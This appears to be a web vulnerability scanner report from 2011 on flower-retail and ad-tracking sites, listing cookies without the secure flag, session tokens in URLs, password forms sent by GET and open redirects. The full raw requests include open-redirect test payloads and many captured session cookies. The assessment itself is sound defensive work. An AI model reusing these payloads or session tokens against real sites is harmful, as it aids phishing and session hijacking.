Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=vkckynuy3ubxtgsnb1qqko4a; path=/; HttpOnly
Set-Cookie: MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; domain=.proflowers.com; expires=Mon, 09-May-2061 12:15:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:15:13 GMT
Content-Length: 53696

<link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_youraccount_styles.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https:
...[SNIP]...
8.2. https://ww30.1800flowers.com/checkoutsignin.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://ww30.1800flowers.com
Path:   /checkoutsignin.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkoutsignin.do HTTP/1.1
Host: ww30.1800flowers.com
Connection: keep-alive
Referer: http://ww30.1800flowers.com/shoppingbasket.do
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; JSESSIONID=0000Fep_6e7sSO_rh0rC-n3Lun2:-1; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.5.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|5|0|0|0|1|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902956353&t2=1304902961198&t3=1304902975503&t4=1304902955083&lti=1304902969048&ln=&hr=javascript%3AsetEvent%28shipping%2CshoppingBasketForm%29&fti=1304902969061&fn=searchform%3A0%3BshoppingBasketForm%3A1%3BUNDEFINED%3A2%3B&ac=1:S&fd=&uer=&fu=/shoppingbasket.do&pi=o-Checkout%20-%20Shopping%20Basket%20Page&ho=blooms.1800flowers.com/cm%3F&ci=90074784

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:03:06 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00005vXThlkYEPvWrxltBHolJWL:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 19826


<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Expires" content="1">
...[SNIP]...
8.3. https://ww30.1800flowers.com/continueasguest.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://ww30.1800flowers.com
Path:   /continueasguest.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /continueasguest.do HTTP/1.1
Host: ww30.1800flowers.com
Connection: keep-alive
Referer: https://ww30.1800flowers.com/checkoutsignin.do
Cache-Control: max-age=0
Origin: https://ww30.1800flowers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.5.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|5|0|0|0|1|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902956353&t2=1304902961198&t3=1304902975503&t4=1304902955083&lti=1304902969048&ln=&hr=javascript%3AsetEvent%28shipping%2CshoppingBasketForm%29&fti=1304902969061&fn=searchform%3A0%3BshoppingBasketForm%3A1%3BUNDEFINED%3A2%3B&ac=1:S&fd=&uer=&fu=/shoppingbasket.do&pi=o-Checkout%20-%20Shopping%20Basket%20Page&ho=blooms.1800flowers.com/cm%3F&ci=90074784; JSESSIONID=00005vXThlkYEPvWrxltBHolJWL:-1
Content-Length: 9

x=74&y=15

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:15:20 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000XbGXHrF9nwuNJodRv3iY_Xi:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 1142175


<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Expires" content="1">
...[SNIP]...
8.4. https://accounts.proflowers.com/CustomerLogin.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://accounts.proflowers.com
Path:   /CustomerLogin.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CustomerLogin.aspx?Ref=HomeNoRef HTTP/1.1
Host: accounts.proflowers.com
Connection: keep-alive
Referer: https://accounts.proflowers.com/Default.aspx?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=tjb3lzavlroebrfrqg11rbq2; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; domain=.proflowers.com; expires=Mon, 09-May-2061 12:15:32 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:15:32 GMT
Content-Length: 60636

<link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_youraccount_styles.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https:
...[SNIP]...
9. Session token in URL  previous  next
There are 3 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

9.1. http://l.sharethis.com/pview  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://l.sharethis.com
Path:   /pview

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pview?event=pview&publisher=a396cc33-4aff-4879-b5e0-d9ab5133031a&hostname=ww30.1800baskets.com&location=%2Fproduct.do&url=http%3A%2F%2Fww30.1800baskets.com%2Fproduct.do%3FbaseCode%3D93260%26dataset%3D11309&sessionID=1304903444417.89540&fpc=bbc31a8-12fd24e67c1-26d7039-1&ts1304903453529.0&r_sessionID=&hash_flag=&shr=&count=0 HTTP/1.1
Host: l.sharethis.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/product.do?baseCode=93260&dataset=11309
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Mon, 09 May 2011 01:18:04 GMT
Connection: keep-alive

9.2. http://sales.liveperson.net/hc/87011923/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /hc/87011923/

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /hc/87011923/?&visitor=16601209214853&msessionkey=2552283548708337271&siteContainer=STANDALONE&site=87011923&cmd=mTagStartPage&lpCallId=891961844870-933812497416&protV=20&lpjson=1&page=http%3A//ww30.1800flowers.com/product.do%3FbaseCode%3D91637%26dataset%3D10305%26cm_cid%3Dd10305&id=384168620&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=800-chat-sales-english&activePlugin=none&cobrowse=true&PV%21unit=800-chat-sales&PV%21pageid=product&PV%21visitorActive=1&SV%21language=english&VV%21VisitorID=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618&title=Fields%20of%20Europe%u2122%20for%20Spring%20from%201-800-FLOWERS.COM-91637&referrer=http%3A//ww30.1800flowers.com/collection.do%3Fdataset%3D10305&cobrowse=true&cookie=FSESSIONID%3D847b741e4593439b8e3ed6040ba46630%3B%20brandCode%3D1001%3B%20ShopperManagerEnterprise%3Daed35ad7-54a3-48bc-a8e0-0c9f3d76e618%3B%20__utmz%3D1.1304902847.1.1.utmcsr%3D%28direct%29%7Cutmccn%3D%28direct%29%7Cutmcmd%3D%28none%29%3B%20cmTPSet%3DY%3B%20CMAVID%3D70091303843240316067555%3B%20JSESSIONID%3D0000vYqYqATbr9y3gSABi7eMNL4%3A-1%3B%20__utma%3D1.2024771767.1304902847.1304902847.1304902847.1%3B%20__utmc%3D1%3B%20__utmb%3D1.4.10.1304902847%3B%20CoreAt%3D90074784%3D1%7C4%7C0%7C0%7C0%7C0%7C0%7C1%7C0%7C0%7C0%7C0%7C1%7C1304902859%7C1_%7C1561_%26%3B%2087011923-VID%3D16601209214853%3B%2087011923-SKEY%3D2552283548708337271%3B%20HumanClickSiteContainerID_87011923%3DSTANDALONE HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16601209214853,d=1303177644; _mkto_trk=id:220-ESA-932&token:_mch-liveperson.net-1304643823223-44198

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:02:01 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 09 May 2011 01:02:01 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 188

lpConnLib.Process({"ResultSet": {"lpCallId":"891961844870-933812497416","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});
9.3. http://t.p.mybuys.com/webrec/wr.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://t.p.mybuys.com
Path:   /webrec/wr.do

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /webrec/wr.do?client=FTD&sessionId=544E1284-8127-56AF-A20F-90F1DFEB835D&ns=1&pt=h&mbcc=405EE1C0-ED35-5D1B-903A-21AA598AE3E3&lang=en&v=4.7.3&mbts=1304902834941&rf=http%3A%2F%2Fwww.ftd.com%2F&purl=http%3A%2F%2Fwww.ftd.com%2F HTTP/1.1
Host: t.p.mybuys.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:00:37 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=9D2A178B4C8160F5F1DD7DA8663002AD; Path=/webrec
Set-Cookie: mbc=""; Domain=.mybuys.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mbc=wQ4lB1nLaBF6/m4UPcv42F1XNaZXwyoF; Domain=.mybuys.com; Expires=Sat, 27-May-2079 04:14:44 GMT; Path=/
Vary: Accept-Encoding
P3P: CP="DSP CAO DEVo TAI PSD IVDo IVAo CONo HISo CUR PSA OUR IND NAV COM UNI INT", policyref="/w3c/p3p.xml"
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-cdn: Cotendo
Connection: Keep-Alive
Content-Length: 34

<html>
<body>
</body>
</html>
10. Password field submitted using GET method  previous  next
There are 2 instances of this issue:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

10.1. http://www.ftd.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 09 May 2011 01:00:16 GMT
X-Varnish: 729964464 729931173
Age: 611
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 134998


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div id="toolbar_signin_form" width="240" style="z-index:1001">
<form style="margin:0px;" action="https://ordering.ftd.com/350/signin/">
<table width="240" border="0" cellpadding="1">
...[SNIP]...
</label>
<input class="password" type="password" name="password" value="" maxlength="18" style="width:125px;" /></div>
...[SNIP]...
10.2. http://www.ftd.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 09 May 2011 01:00:16 GMT
X-Varnish: 729964464 729931173
Age: 611
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 134998


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div id="billing_page_signin_popup" width="273">

<form action="https://ordering.ftd.com/350/signin/">
<table width=273 border=0 cellpadding=1>
...[SNIP]...
<td width='60%' align=left><input type="password" name="password" value="" size="12" maxlength="18" /></td>
...[SNIP]...
11. Open redirection  previous  next
There are 2 instances of this issue:

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targetting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:

11.1. http://ad.trafficmp.com/a/bpix [r parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The value of the r request parameter is used to perform an HTTP redirect. The payload http%3a//a81049c2410b28106/a%3f was submitted in the r parameter. This caused a redirection to the following URL:

Request

GET /a/bpix?adv=1657&id=1&r=http%3a//a81049c2410b28106/a%3f HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305606&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; dly2=3-lkkjy3-P~hoc~0~1uo0~1-; dmg2=2-null7566%4050%4057+53%3A01%3A72%3ANZ+%7Cnulll%7CHHF%7CX357%7CIIG%7CQ599.055%7CS50127%7C1fbsgynlre.pbz%7CJ078%7CWfbsgynlre+grpuabybtvrf+vap.%7CLfgbjr%7CR%40527.191%7Cnull%40955%7CDoebnqonaq%7CZ%3F%7C-; hst2=3-lkkjy3-1~70y9vrnt7vq8~146z~2ihm~0-; pct=1-oevyvt~gn7ey36j-vOrunivbe~gn7ey36i-yhpvq~gn7ey36j-; T_de95=ahc%3Aljs1%3A1; rth=2-ljzkpb-ahc~ljs1~1~1-g9g~lg1x~1~1-g9c~ld22~1~1-gyx~kz8s~1~1-jxb~e876~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 09 May 2011 01:01:26 GMT
Location: http://a81049c2410b28106/a?
Connection: close
Set-Cookie: T_de95=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_ifr9=gj9%3Ax0t3%3A1; Domain=trafficmp.com; Expires=Tue, 08-May-2012 01:01:26 GMT; Path=/
Set-Cookie: rth=2-ljzkpb-gj9~x0t3~1~1-ahc~ljs1~1~1-g9g~lg1x~1~1-g9c~ld22~1~1-gyx~kz8s~1~1-jxb~e876~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Tue, 08-May-2012 01:01:26 GMT; Path=/
Content-Length: 0

11.2. http://pix04.revsci.net/K10145/a3/0/3/pg.302 [tgt parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /K10145/a3/0/3/pg.302

Issue detail

The value of the tgt request parameter is used to perform an HTTP redirect. The payload http%3a//a3ca190b6a3d9a078/a%3fhttp%3a//ads.revsci.net/adserver/ako%3factivate%26type%3dgif%26csid%3dK10145 was submitted in the tgt parameter. This caused a redirection to the following URL:

Request

GET /K10145/a3/0/3/pg.302?D=DM_LOC%3Dhttp%253A%252F%252F1800flowers.com%252Fwelcome&tgt=http%3a//a3ca190b6a3d9a078/a%3fhttp%3a//ads.revsci.net/adserver/ako%3factivate%26type%3dgif%26csid%3dK10145 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305606&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw+R2Jc/MY